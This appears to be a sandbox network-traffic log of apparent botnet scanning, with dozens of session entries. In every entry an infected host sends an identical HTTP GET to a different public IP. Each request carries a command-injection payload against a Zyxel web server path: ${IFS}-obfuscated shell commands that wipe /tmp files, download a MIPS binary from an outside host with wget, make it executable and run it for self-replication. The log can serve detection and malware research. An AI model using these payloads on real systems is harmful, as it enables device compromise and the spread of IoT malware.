                                                Jan 28, 2024 10:16:44.096925020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9165192.168.2.235025268.72.248.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096954107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9166192.168.2.235717280.239.146.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096978903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9167192.168.2.235770463.201.138.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.096999884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9168192.168.2.2348468146.64.68.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097049952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9169192.168.2.2340884110.139.12.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097084999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9170192.168.2.233302650.43.162.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097100019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9171192.168.2.2346678161.28.137.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097110033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9172192.168.2.2359684219.194.217.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097158909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9173192.168.2.234173681.224.20.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097206116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9174192.168.2.23441044.27.109.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097208023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9175192.168.2.2349138104.99.13.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097232103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9176192.168.2.2348266111.16.186.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097248077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9177192.168.2.235409291.151.88.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097301006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9178192.168.2.2354684158.52.65.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097323895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9179192.168.2.23563721.202.67.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097357988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9180192.168.2.235115879.64.240.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097364902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9181192.168.2.2352584160.103.78.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097397089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9182192.168.2.233521219.47.122.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097425938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9183192.168.2.2360170222.147.152.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097425938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9184192.168.2.2353994176.104.33.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097456932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9185192.168.2.2342092108.2.144.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097493887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9186192.168.2.2347932218.190.149.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097505093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9187192.168.2.2346612204.11.114.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097512960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9188192.168.2.2356254219.221.166.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097544909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9189192.168.2.235422887.197.25.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097558975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9190192.168.2.233951293.197.181.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097585917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9191192.168.2.2344574161.242.109.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097587109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9192192.168.2.2350438181.200.30.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097606897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9193192.168.2.2344276123.41.11.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097645044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9194192.168.2.233595897.197.115.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097670078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9195192.168.2.2342444134.188.90.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097706079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9196192.168.2.2336354128.62.101.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097738028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9197192.168.2.236064081.170.109.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097748041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9198192.168.2.2359062180.166.82.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097800016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9199192.168.2.233422288.24.235.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097824097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9200192.168.2.2335748139.14.135.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097866058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9201192.168.2.2359088209.0.20.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097901106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9202192.168.2.23438765.143.220.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097913027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9203192.168.2.2350396137.241.92.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097940922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9204192.168.2.2355824140.18.55.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.097973108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9205192.168.2.233855261.197.47.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098009109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9206192.168.2.2344268130.47.111.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098027945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9207192.168.2.23523248.218.51.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098051071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9208192.168.2.2350274152.19.209.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098068953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9209192.168.2.2359516158.42.168.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098103046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9210192.168.2.2333456200.235.39.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098155975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9211192.168.2.235282690.222.185.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098160982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9212192.168.2.235264647.197.19.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098192930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9213192.168.2.2338544222.252.211.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098203897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9214192.168.2.2349552183.181.138.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098222017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9215192.168.2.2343546101.162.246.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098233938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9216192.168.2.235852498.0.26.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098299980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9217192.168.2.23598549.18.69.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098316908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9218192.168.2.234801675.65.31.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098330021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9219192.168.2.235958495.21.108.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098366976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9220192.168.2.2341332199.174.84.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098371029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9221192.168.2.2345858199.54.49.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098428965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9222192.168.2.2337682133.89.123.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098440886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9223192.168.2.2343636139.224.129.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098462105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9224192.168.2.2337844139.144.159.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098464012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9225192.168.2.2355778197.221.184.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098484993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9226192.168.2.2335702121.193.123.7443
                                                TimestampBytes transferredDirectionData
